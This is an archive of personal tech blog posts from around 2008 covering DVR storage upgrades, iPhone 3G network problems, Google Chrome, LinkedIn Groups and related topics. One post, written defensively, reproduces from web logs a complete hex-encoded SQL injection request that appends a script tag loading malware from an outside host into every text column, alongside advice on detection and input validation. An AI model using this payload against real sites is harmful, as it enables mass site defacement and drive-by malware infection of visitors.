I enjoy the fact that my DirecTV DVR (model HR21-200) records HD content for me. The quality is generally pretty darned good (it does 1080p video now after a recent a software upgrade), and it beats the heck out of anything else available to me in the boonies. The unit comes equipped with a 320GB (give or take) internal drive, which allows something like 30 hours max of HD recording. I found that when recording full seasons of a few shows like The Office or Lost in HD (and most of us will tend to add a few HD movies in the mix), the drive tends to fill up before I want it to.

So, I ordered a Cavalry 1TB external eSATA/USB 2 drive from Newegg.com, which arrived today. I've hooked it up and it's working. My new capacity numbers? Well, it depends on the specific content, but up to about 145 hours of HD content or as much as 1000 hours of SD programming (wow). Variables that affect actual video-time capacity includes resolution, compression (MPEG2 uses more space than the newer MPEG4) and how much motion there is in the video (since more motion means less compression benefit).

I wanted to document the simple setup steps here, so people can get theirs to work if they should want to do the same thing. You can find similar info on the 'net, but people seem to have a hard time with it. My drive came pre-formatted NTFS, which is fine. The DVR will wipe any file system on whatever drive you hook up. Below are the steps that one needs to follow in order to get the external drive up and running with the DVR. The order of the steps is crucial. Don't try to power up your hard drive after you start the DVR, for example.

First of all, if your external SATA drive is a Seagate FreeAgent, you will probably not have any luck, unless you have a HR20 DVR unit. I've heard many stories from people who bought a FreeAgent drive and tried to attach it, with no luck. So, while the FreeAgent drives are great for gneral storage, they are probably not what you want to buy to attach to your DirecTV receiver. My HR21-200 unit simply refused to work with my 750GB Seagate drive, so it's doing video editing duty now. Your mileage may vary, but my experience is that they just don't work.

To start using your new hard drive:

1. Power down the DVR.
2. Unplug the DVR from the wall power. This is important.
3. Attach the external drive's eSATA cable to the back of the DVR unit.
4. Power up the external hard drive first, and allow it to "spin up" (give it about a minute to be safe).
5. After the hard drive has "spun-up," plug the DVR back into the wall power plug.
6. Be patient (very patient) and wait for the DVR to restart. It's not dead. Be patient.
7. After it does it's thing, you'll be able to watch TV again. Check your recorded items list and make sure it's blank.
8. Run a recording test and make sure you can play back.

Note that the DVR's internal drive is completely bypassed when you add a new external hard drive - the system no longer sees it. So your recordings and what-have-you from the internal drive will not be available to view. However, in my experience if you restart the DVR without the external drive attached the internal drive "comes back to life" and you'll see your old recordings there.

Any scheduled recordings on your "To Do List" that you set up before adding the external hard drive will no longer be programmed. This is important - You will need to set up your recording schedules again. Head over to DirecTV's online scheduler or their mobile scheduling site at http://m.directv.com and sign in to start setting things up. I sometimes find the mobile site to be a bit easier to use, even on a desktop or laptop PC - especially since it lets me search by name.

Also, note that whatever you set up online may not be configured using the default recording setting you've established on your receiver, so be sure to go to the receiver's Manage Recordings list and review the new items that appear in your To Do list to make sure they're set to what you want. In my case, I had to make changes. Seems like recordings scheduled online should use the defaults you've established on your machine, but they didn't for me.

Most importantly, you can look for good deals on decent external eSATA hard drives to do an inexpensive upgrade to your DVR. If you like spending lots of money, you could go to one of the sites that offers upgrade hardware services, but one such site sells essentially the same drive I bought and installed myself. Their price? $299.00, and that's just for the hardware. If you want your internal drive copied to the new drive, they can do that for an additional $59 - Not worth it to me.

How much did I pay for mine? $167.00 from Newegg. You can do the math. Shop around, prices are even lower now, and you can find an even better deal out there.

Over at Wired's Gadget Labs blog, Brian Chen writes about information discovered during a webcast presentation on Thursday covering the recently discussed iPhone security weaknesses having to do with bypassing the password-protected lock screen.

Jonathan Zdziarski, a data forensics expert and author of the forthcoming book "iPhone Forensics," did the presentation for law enforcement personnel and anyone else who might have a need to access an iPhone to discover information. During the presentation, in which he outlines a method for breaking into the phone with modified firmware and some hairy manipulation, he also showed how the iPhone takes a screenshot of every application the iPhone's user closes by pressing the "home" button. The saved image is used to "draw" the collapsing screen animation you see when your application closes and you're returned to the home screen. The image file is then deleted from the iPhone's storage.

But, nothing is ever really completely "deleted." And in this case, apparently when the temporary image file is killed from storage, the data "on-disk" is not overwritten or otherwise cleaned, so anyone with some basic forensics knowledge can search the iPhone storage space for the old files and recover them easily. You can do the same thing on pretty much any computer.

Depending on your point of view, this is either a potential privacy issue or a great forensics feature. Having worked as both a police officer and as a business security professional responsible for privacy and data integrity issues, I can understand both arguments. Certainly as a cop, being able to dig into someone's iPhone (with a proper warrant of course) to find evidence of crimes where the phone was used in some manner is of real value, and screen shots are potentially pretty useful evidence. But as a person who also values privacy as a matter of basic principle, it's a little disconcerting, especially since I didn't realize until today screen shots are being made.

The webcast recording is not yet available as of the time of this writing, but it should be posted to http://www.youtube.com/OreillyMedia in the next few days. If you're interested in learning something about electronic data forensics, it will be worth the time to check it out. Here's the O'Reilly abstract from the session:

In this free, live webcast, iPhone hacker and data forensics expert Jonathan Zdziarski guides you through the steps used by law enforcement agencies to bypass the iPhone 3G's passcode lock by creating a custom firmware bundle. Author of the upcoming book, iPhone Forensics, Jonathan has devoted much of his talent supporting law enforcement personnel with his development of a forensics toolkit that allows them to recover, process, and remove sensitive data stored on the iPhone, iPhone 3G, and iPod Touch. This live presentation is aimed towards law enforcement and anyone else who has a need to access the not-so-readily available data on an iPhone.

As is the case with more and more technology in the modern age, it's when you start to combine the power of two or more technologies that you realize the full potential of each. Such is the case with Microsoft's Unified Communications products. Sure, Exchange and Office Communication Server are both great on their own, but when you use them together (and potentially integrate with your VoIP phone system), you realize the greater value of your investments.

Jeff Goodwin works at The VIA Group, where he specializes in Microsoft Exchange and Microsoft Unified Communications in his position as Senior Technologist and Microsoft Practice Lead. He's executed a large number of UC projects for businesses, so we were fortunate to have the opportunity to speak with Jeff recently on RunAs Radio. He does a fine job of explaining what unified communications is all about.

Jeff Goodwin Rings Us Into Unified Communications
RunAs Radio Show #73 - 9/3/2008 (35 minutes)

Richard and I talked to Jeff Goodwin about Microsoft Unified Communications in this week's RunAs Radio show. Jeff lays out the relationship between Exchange, Office Communicator and Unified Messaging Server to combine email, telephone and instant messaging. Check out Jeff's TechNet articles at http://www.shrinkster.com/11mj and http://www.shrinkster.com/11mk.

RunAs Radio is a weekly Internet-audio talk show for IT Professionals presented in a high-quality podcast format. Since April 2007 RunAs Radio has brought experts in the field of IT to its 10,000+ listeners, to inform and entertain. Professionally produced interviews are about 30 minutes in length and pack a substantial amount of information for maximum benefit. For more information about RunAs Radio, visit http://www.runasradio.com. RunAs Radio is available on iTunes and the Zune Marketplace, as well as directly from the RunAs Radio web site.

Chrome has been available for about 12 hours. What's your point of view and experience with Google's new browser?

A bit of a simplistic poll, I know - But covers the bases as far as hot-to-cold opinions. Choose the one that's closest to yours, and feel free to comment as always.

UPDATED: Chrome is now out and available for Windows, other platforms coming in the future - Check out http://www.google.com/chrome/

As mentioned earlier here and everywhere else on the 'net, Google's Chrome web browser is coming. Today Google put an official release notice on its Official Google Blog, and they tell us it will be made available for you and me to download and try on Tuesday.

Over at Google Blogoscoped there's a whole bunch of screen shots you can check out if you can't wait until tomorrow. Screen shots are a bit hard to come by today, but tomorrow it'll be in-person for everyone, and you can probably imagine how many people will be posting pictures and writing about the new browser.

Google seeded a paper comic book to some people recently, to present and describe their future web browser (or you might just think of it as the web browser of the future), which is called Google Browser or Chrome.

So, what's the story? Making the browser more stable, more usable, more secure. At first glance, it looks like a strong starting point for the future of Internet browsers. Written from the ground-up from scratch and with the experience of several years of past browser platforms to learn from, Google has addressed many of the main concerns in today's browsers.

Now the only question is: When will we get it? I will be watching here to see if something shows up. Hopefully it's soon!

UPDATE: The release date is tomorrow (Tuesday, September 2, 2008) - More info and link to screenshots here.

A variety of technologies are incorporated into the Chrome design that improve on common browser weaknesses. The key improvements fall into the areas of stability (memory allocation and management, process management), some incredibly cool javascript environment enhancements (in the form of a new, open-source javascript engine), a bunch of user experience improvements and significant security changes.

And, it's all open source. That's right - Anyone (including other browser makers) can leverage the work done in the Chrome project and can contribute or modify to meet their own needs. Good move, Google.

Pretty exciting stuff. It will be fun to see what comes next, and when.

As mentioned the other day, LinkedIn today released their new Groups features. Groups are one of the most popular features on LinkedIn, despite the limited feature-functionality provided for groups on the web site in the past.

The new features include a searchable contacts roster (search by name, company, or other keywords such as specific areas of expertise), which is accessible to all members; and discussions with email-digest notifications (which are configurable by individual group members). A few screen clips of the new functionality are shown below, and LinkedIn has published an informational page describing the new functionality.

Notification when you sign in that your managed group now has new features:

The new tabs available reflect the new functionality:

Choose your notification email delivery preferences for discussions:

Write a new discussion topic for the group:

Recent discussions list:

Vidoop Labs has a dream:

The dream is to see Identity baked into all browsers. Just imagine opening your web browser and then selecting your Identity Provider (IDP) the way you select your default search provider. The benefits are numerous; never type in a username, never look for a login button/page (you are authenticated when you land on a domain), no phishing/MITM (the browser can do domain and SSL cert validation). You fire up your browser and authenticate (or login) similar to the way you log in to your computer every time you turn it on. The difference is you get to choose your provider and can take control of the data you safeguard, store and share on the Internet.

I could get into that.

Vidoop is a Portland, Oregon company that has built some interesting technology around OpenID. I really like the idea of OpenID, and I have a couple OpenIDs of my own that I use on various sites. But OpenID is not exactly perfect. It's still relatively young, and from the usability standpoint it needs improvement. The identity and authentication requirements of the modern Internet demand some additional features and capabilities that OpenID doesn't deliver (and you can argue that it shouldn't). By combining openID with other technologies (such as Information Cards and other strong-auth offerings) and improving usability for end-users, it could become a widely-adopted, used and trusted standard, or part of a broader one covering strong authentication and identity protection/assertion in a commonly-accepted and deployed package.

Vidoop's Luke Sontag today posted an announcement that the company's newly-formed Vidoop Labs has fired up a community project called IDIB (pronounced "Eye-Dib"), which aims to improve on the OpenID usability model and make it stronger at the same time. They've released a developer preview of IDIB in hopes of involving people and getting your input and feedback.

From the Vidoop announcement:

Over the past few years we’ve seen the adoption of OpenID continue to increase but the work that we’ve done as a community to develop this technology has only just begun. Looking at the landscape of OpenID adoption, its clear that there are several key factors inhibiting adoption, but two that we want to focus on today, namely usability and security in the browser.

It was almost two years ago when the Firefox 3.0 roadmap wasannounced and OpenID was mentioned as a new component to the platform. The Mozilla Firefox team looked to members of the OpenID community to step up and provide guidance on what exactly we imagined identity in the browser looking like, but we failed to mobilize and answer their call.

In light of that missed opportunity, Vidoop Labs has been working hard over the last several weeks to produce a prototype that we intend to use to initiate a wider discussion about OpenID in the browser and what it might look like.

And the current developer preview (which is open-source) is just a beginning. Imagine leveraging Information Cards (such as one would use with Microsoft's CardSpace, or the similar open-source offerings for Mac and Linux) in the cloud, and being able to use OpenID - one logon for all your web sites - confidently, securely and with proper security protection.

The Internet needs a good, strong, reliable, usable and secure standard technology to solve the issues related to user names, passwords, single sign on and identity protection. IDIB looks like a serious and positive attempt to start the journey directly down that path.

I thought I'd present some casual observations I made throughout the day Wednesday on a trip from Portland to Seattle, as well as some newly reported information about the AT&T 3G network that's hit the 'net over the past 24 hours or so.

The back-story here is that I - like many others - have found the reliability and consistency of the iPhone 3G to be less than satisfactory while on the 3G AT&T network.

First of all, it became clear to me over the course of several hours yesterday that the iPhone is not to blame with regards to connectivity on the 3G network. While driving from Portland, Oregon to Seattle, Washington and back yesterday, I had the opportunity to run a whole slew of speed/connectivity test sessions using the iPhone app called "iNetwork Test" (click here to get the free app in the iTunes App Store).

AT&T actually has fairly impressive 3G network coverage from south of Olympia, Washington practically all the way to Seattle, with one or two small gaps in-between where the phone switched to EDGE. Much of the area along that I-5 corridor is rural or sparsely-populated. From a wireless connectivity standpoint, it's a pretty decent area to live in if you're going to be far away from the city.

My experience in using the 3G network along my drive up and down the Interstate can be summed up thusly:

In areas with higher population density, and thus more iPhone (and other device) users, ability to a) connect to the voice network and make calls, b) stay connected to the voice network, c) make data connections and d) maintain data connections was substantially worse. The difference between dense and sparsely populated areas was like night and day.

Where population density was lower, even in cases when fewer bars are displayed on the signal strength icon, voice and data connections were reliable and solid without exception. In contrast, in high-population areas even full-signal connectivity was spotty and unreliable.

I'm running the latest iPhone software, v2.0.2, which both Apple and AT&T have encouraged people to upgrade to. AT&T even sent a text message to all users asking them to upgrade - a first-time action on the part of the carrier.

Some new information, part of which you'll find quoted below, helps explain why I experienced substantially poorer performance in the cities and heavily-populated areas but not in the rural sections of my drive. According to reports, it appears AT&T's 3G radio systems are power-constrained, and are not able to maintain all the connections. The incredible number of iPhone 3G devices on the network - especially in metropolitan and urban areas - is most certainly placing a heavy load on the radios. In addition, iPhone 3G devices that have not been updated to the v2.0.2 software are placing an even heavier burden on the radios from a power-consumption standpoint.

So, there's a power-management problem, as well as a capacity problem. When the network "noise" in the radio spectrum used gets to be higher, the towers have to increase power to try to overcome the noise. You can see how that doesn't work. Eventually the noise keeps climbing and the power consumption at the tower (and presumably on the iPhone as well) goes through the roof.

More towers would increase capacity, reduce power requirements and resulting noise, and generally improve coverage. But that's not something that can be changed overnight.

All of this helps explain why my ability to make calls, connect to the 3G data network and download at high speeds was much better where the network is only lightly used.

The Daily Tech site has a detailed report (and some intelligent reader comments) that describes the cell-site power issues, the problems related to the older iPhone 3G software, and other items. Go to the Daily Tech site to get all the details. Here is a portion of the information, including some text quoted from Roughly Drafted Magazine, whose author was able to get some new details from a source inside AT&T's wireless business describing the power issues and what the iPhone's v2.0.2 software update changes:

Basically the update "fixed power control on the mobile" according to the source. To understand what they're going to say next, you must first know a bit about AT&T's jargon for UMTS -- the technology it uses to deliver its 3G network. In the technology, phones are referred to as user equipment, "UE" for short. The base transceiver station towers are known as "Node B".

With this jargon in mind, the AT&T source explains:

"In UMTS power control is key to the mobile and network success. If the UE requires too much downlink power then the base station or Node B can run out of transmitter power and this is what was happening. As you get more UEs on the cell, the noise floor rises and the cell has to compensate by ramping up its power to the UEs. If the UE power control algorithm is faulty then they will demand more power from the cell than is necessary and with multiple users this can cause the cell transmitter to run out of power. The net result is that some UEs will drop their call. I have seen the dropped call graphs that correspond to the iPhone launch and when the 2.0.2 firmware was released. The increase in dropped calls, (were the result of) dropped calls due to a lack of downlink power."

In essence, the iPhone is asking for a stronger signal than it needs. In areas with lots of users, some or all of whose phones are doing this, calls start to get dropped and signal quality drops. This all follows with the conclusions the media had reached -- the problems were somehow correlated to user distribution and seemed puzzlingly to be both with AT&T's network, and with the hardware.

The source continues:

"The power control issue will also have an effect on the data throughput, because the higher the data rate the more power the Node B transmitter requires to transmit. If the UEs have poor power control and are taking more power than is necessary then it will sap the network’s ability to deliver high speed data. This is one of the reasons why AT&T has been sending text messages to users to persuade them to upgrade to the 2.0.2 software. In a mixed environment where users are running 2.0, 2.0.1, and 2.0.2, the power control problems of 2.0 and 2.0.1 will affect the 2.0.2 users. It is not the network that is fault but the interaction of the bad power control algorithm in 2.0 and 2.0.1 software and the network that is at fault. The sooner everybody is running 2.0.2 software the better things will be. Having seen the graphs the 2.0.2 software has already started to make difference."

Since transmitting lots of data takes lots of transmission power, and transmission power was unnecessarily being raised above that necessary for the use levels on phones, the network in areas of heavy use was unable to handle high speed data.

My first-generation Nikon D70, which I bought the day it was released to the market a few years back, died on me a few months ago. Without a card in it, it won't start, and when you insert a CF card in the slot, the green data-access indicator flashes on and off. If I hold down the Menu button, the menu flashes on and off along with the green LED.

As it turns out, this is a known problem with the original Nikon D70 cameras, and Nikon USA has a service bulletin out on the camera body. They'll repair it free of charge.

So, if you have the same problem, visit this service bulletin page, click on the D70, and you can access a PDF file that you'll need to print, fill out and send to Nikon along with your camera body. Be sure to take your camera strap off and remove the battery, and don't send any lenses or other accessories.

Mine's on it's way to Nikon now - they say the turnaround is five days (plus shipping time).

Well, this is a little embarrassing. Intergalactic malware has made it's way into the news. A computer virus on the International Space Station. No AV software on the laptops they use, nor (apparently) is there a process of security checks on personal computer equipment like USB thumb drives carried by astronauts being rocketed to the International Space Station.

Granted, the virus in question in this case is pretty innocuous, and apparently other viruses that have made it into space aboard computer gear in the past (it's really quite difficult to mention that in passing) have also been more of an inconvenience than a real security threat.

But imagine a virus that might make its way on-board and do more damage. Not good. It looks like it's time for some effective process and possibly some basic security technology - You know, just in case.

The author of that virus has something new to brag about, though. That's for sure.

LinkedIn has started sending owners of certain LinkedIn Groups email letting them know that on Friday they'll be enabling a new discussions capability for group managers and members. A friend received the information for his LinkedIn group today, but I have not yet received it for the one I co-manage, PDX Tech. So, it's not clear whether this is rolling out to all groups or just some.

The addition of this new Groups functionality is a great move. To date, people who manage LinkedIn groups have had very limited options in terms of how to enable networking and communication among their groups. One can manually export a delimited-text file in a few formats to let you send emails, but outside of that the group interaction model has been short-featured, and required use of outside services - a sloppy model at best.

In addition to the group discussions, they plan to release an enhanced, searchable membership roster capability. Earlier this summer they introduced a searchable Groups directory. Positive changes appear to be happening.

Below are the details from the LinkedIn email.

Dear #####,

First, thank you for managing your group on LinkedIn. We sincerely appreciate the time and effort you devote to your members, and we know they value it. Together you have made Groups one of the top features on LinkedIn.

This Friday, we will be adding several much-requested features to your group:

• Discussion forums: Simple discussion spaces for you and your members. (You can turn discussions off in your management control panel if you like.)
• Enhanced roster: Searchable list of group members.
• Digest emails: Daily or weekly digests of new discussion topics which your members may choose to receive. (We will be turning digests on for all current group members soon, and prompting them to set to their own preference.)
• Group home page: A private space for your members on LinkedIn.

We're confident that these new features will spur communication, promote collaboration, and make your group more valuable to you and your members. We hope you can come by LinkedIn on Friday morning to check out the new functionality and get a group discussion going by posting a welcome message.

Sincerely,
The LinkedIn Groups Team

A couple of small, independent evaluations of the iPhone 3G's performance, which has been much maligned by many of it's customers (including me from time to time), have been published in the past day or so. The results are interesting to consider, especially side-by-side.

In the first test, Swedish tech site GP took their iPhone 3G to a super-fancy antenna test chamber at a company called Bluetest, where they ran the iPhone through the highly technical paces along with a few other 3G phones for comparison purposes. Results are available on the GP site.

In the second test, Wired asked readers to participate in testing from the field, where they gathered and submitted speed and other connectivity data with their own phones. Wired then analyzed, mapped and posted the results as well as the test data in complete raw format at their site.

In the end, what did the tests yield? Well, you should read them for yourself and draw your own conclusions, of course. But in a nutshell, here's my take on what they found:

• GP's antenna test found that the iPhone 3G's antenna performs as well as any of the other 3G phones tested.
• The Wired real-world network test found that the networks are often woefully underperforming, and that while speeds are typically faster than EDGE, the ability to connect to a 3G tower might be problematic at best.

So, does this mean Apple-provided software fixes may not be able to solve the iPhone's 3G woes? It seems that in the case of network performance where the number of "bars" showing on 3G is at the bottom of the scale yet a EDGE network has a strong signal, trading off could be done better by the phone. But what really needs to happen to solve the big-picture problem is better 3G coverage. My experience in several cities has been that 3G coverage is poor in many cases, and inconsistent at best. In fact, if the AT&T EDGE/2.5G network was not available as a fall-back (or maybe "call-back" is a better term, given the dropped call rate), AT&T would never be able to sell their service. The effective 3G network coverage just isn't good enough to stand on its own. And poor coverage combined with all those handoffs and network drops just mean more and more battery power being applied by the device to keep re-establishing it's 3G connectivity.

However, any software fixes for lockups, freezing and app crashes will require Apple taking action. One thing I've wondered lately: Are device/software hangs and crashes causing or somehow related to network connectivity issues? Could one be causing the other, at least part of the time? I have noticed locking/hanging in several apps while the iPhone tries to connect to the AT&T network (as evidenced by the simultaneous flurry of AT&T radio-speaker-dance noise that we've all become familiar with over the past several years).

I like to listen to my Pandora "stations" in the background while working on my laptop. I get frustrated when I accidentally close the web browser (often its in a hidden tab) or, even worse, click on a link soewhere and Safari, in all it's awesomeness and wisdomness, re-uses the window and kills the audio feed.

In hopes of finding a better way, I started searching for a Pandora widget for the Mac Dashboard (the layover-page that you can put any of a number of downloadable mini-apps on). Unfortunately, I didn't find anything. (Update - turns out there is a widget out there, but it's a memory hog and apparently has a few issues). So, rather than looking for someone else to do the work for me, I started to actually think about a solution I could build on my own.

After about 10 minutes, I remembered the nifty capability in Safari to define a "snipped" portion of a web page and make it a Widget on the OSX Dashboard. You use the little scissors icon in Safari to accomplish this. I started thinking about the Dashboard and how it works, and wondered if there was any way to have Pandora play in the background using a system (the Dashboard, that is) that appears to reload each app every time I launch it.

What the heck, worth a shot, right? Well, I found I could create a web-clip of Pandora's music player that would play my music. No big surprise there. Click on the image to see the widget full-size.

But when I exited the dashboard to go do some actual work, the music would quit.

Bummer.

I got curious though. Maybe someone had thought about the fact that web pages constantly change and play music and whatever else. I did the obvious: I clicked on the little (i) button in the lower right corner of the widget and it took me to the page where I can choose to make the widget look like it's torn from a piece of paper, or whatever. And, lo and behold, right there in the lower left, is a box that makes it appear you can uncheck it and make the audio play in the background, even when dashboard is not active. I've highlighted that box below.

Would it work? I unchecked the box, exited Dashboard, and the music kept on playing in the background. Problem solved! It turns out the default setting is to play web page audio only when Dashboard is active, so you have to toggle the setting to get what you want.

Any other ways to do this? My method works great, but I wonder if someone else came up with a different solution?

Boy Genius says iPhone software v2.0.2 is on it's way out the door this afternoon. In fact, I just checked in iTunes, and there it is.

All 248.7MB of it. The description in the iTunes UI says it contains bug fixes, and that's it. Here's hoping the performance and stability issues - especially related to 3G network performance and switching - are what they fixed in this release. I almost returned my phone the other day out of sheer frustration, and that's saying a lot, really.

Update: After a couple hours of on/off use, apps are notably more stable/snappier (at first I wondered if it was just my imagination, or a fresh restart effect - time will tell), and network performance is better. Where a 3G network with poor or broken signal would be selected before, now a strong EDGE network is selected by the phone. Apps don't seem to hang in places where they reliably (or maybe the better term would be "predictably") hung before the update. For example, the volume controls in almost every app used to not respond for periods of time. Now they work every time. Much less frustrating. There are no real changes in terms of ourward appearance and functionality.

A bunch of IT and web-app teams have lost a lot of sleep lately...

Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).

The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).

Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).

About data validation...

I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default, it's the only safe way to go.

UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parametrized queries in SQL server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered conbination of both input validation (where it's practical and workable) and paramaterized queries is a good approach, in my opinion.

The attack

Secure Computing's TrustedSource (good site, read it) has some detail about the attack...

You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least what's where I have seen them coming from).

How to solve?

First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off javascript and manipulating data en-route to the server is pretty easy, after all).

If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in from of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.

HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically called Scrawlr. You can find it, and related information, here.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.

There are a lot of so-so iPhone apps out there, fun to use once or twice but not killer applications that you simply must have. DataCase is a candidate for that latter classification. (Available via the app store for iPhone and iPod Touch, $6.99)

The DataCase app allows you to copy files from your PC or Mac to the iPhone via the wireless network using a drag-and-drop method. Once on the iPhone you can view and use the files in mobile mode. There's support for MS Office formats, PDF, text, common images, HTML, plus any audio and video the iPhone OS would normally support.

It's pretty slick. I'm playing with it now and can see the real benefits of having a variety of key files, documents, etc. available on the mobile device any time I need them. One problem common to all iPhone apps is the fact that it has to be running in the foreground in order to access the app remotely - no background execution. Good thing I bought this 16GB iPhone eh?

Links: Veiosoft web site and a review at TUAW.

I'm a rural-living person who often consults people on how to get broadband Internet connectivity to their middle-of-nowhere homes. There's some good news for most of those people. HughesNet, the big guy in the satellite Internet service space operated by Hughes Network systems (no relation), has announced that later this month they will begin offering what they're calling the ElitePremium plan, with download speeds available as fast as 5 megabits per second (mbps). That's up there speed-wise with what many cable companies provide, and is easily a competitor to DSL speed capabilities. It'll be available to order on August 21st.

Satellite Internet has some inherent latency between the time a request is sent and the resulting data is fed to you, since the distance the signal travels, even at the speed of light, is pretty darned far. Many VPN systems have a difficult time on Satellite, also due to the time-shift latency. But the "start" delay is not huge, and once the "faucet is open," 5 mbps is pretty darned fast.

That's about five times the download speed I get on my Internet connection, which is an excellent terrestrial wireless offering from a local provider (which is Cascade Networks, if you happen to live in the Longview, Washington or Columbia County, Oregon areas). An antenna on my roof points at a tower on a mountain about 11 miles away, and that's the option I use.

So, more options and much faster speeds for us non-city-dwellers. Not a bad deal!

Every now and then you'll discover a couple or few smaller apps that work well together, or alongside each other. The type of situation where you get the 2+2=5 effect. Individually both apps are great, but when used together they becomes something even more. "Two great tastes that taste great together," to borrow an old marketing phrase.

That's been the case for me with two iPhone apps - Shazam (iTunes store page) and Pandora (iTunes store page). Today I use them alongside each other. It's my hope that someday they will be able to communicate with each other and share information.

I've written about Pandora here before. It's a web app that happens to have an iPhone client as well, where you can start with music you like and it helps you find more music that fits your taste and style. You create channels, or stations, and the Pandora service selects similar music for your to hear, and you can fine tune as you go.

Shazam is another of those magical "wow" apps for the iPhone. I use it in the car when I hear a song I like. Rarely do I know the name of the song, or even the artist. But as it plays, I just tell Shazam to listen to a 12-second portion of the song (a process called "tagging"). It uploads the resulting data to the centralized service, and back comes all the information about the song - Artist, title, album, everything. It's really amazing, and in my experience 100% accurate. From there you can also find YouTube videos and launch into the iTunes store to buy the music you've tagged.

I'll often take the name of an artist I discover from Shazam and plug the info into Pandora and start listening there. It's a great way to quickly and relatively effortlessly drill down into new music I have never heard before, but it's music that I really like.

Now imagine if you could use Shazam to identify a song and then inside Shazam choose an option to create a channel based on that artist in Pandora. That would be awesome, truly awesome. I have no idea how "possible" it is, but I can hope. :)

On a similar note - meaning various apps that work great together - ReadWriteWeb published an article this past week with a list of apps that complement each other well (including my Shazam/Pandora combination).

My title for this post sort of spins the title of the article I want to point you to, aiming for the positive side of the coin. The article, which is entitled "The Top 5 Reasons Tech Execs Fail," provides a set of bullet-pointed thoughts that can be read as a list of what tech execs need to do in order to succeed. I happen to agree with the authors' assessment.

Here's the short version of Marty Abbott and Michael Fisher's five points, slightly altered to read as a list of positive attributes of a successful tech leader:

5. Ability to Build World Class Team
4. Ability to Execute
3. Ability to Lead/Motivate/Inspire
2. Ability to Manage Operationally
1. Displays and Uses Financial Acumen

The authors point out in their article, "... when technology executives fail, it is not because they lack an individual skill. It is because they lack an an adequate balance of the many technical, operational and leadership skills necessary to make them a complete manager."

You should listen to your online friends. They often have great ideas, like in this case. I was recently turned onto a simple but effective alternative to bulky plastic cases and leather holsters for my new iPhone 3G. It's called the invisible SHIELD . The product, simply put, is pretty darned terrific. You hardly know it's there, and it protects like crazy. You can also get invisibleSHIELD for the iPhone first-generation device.

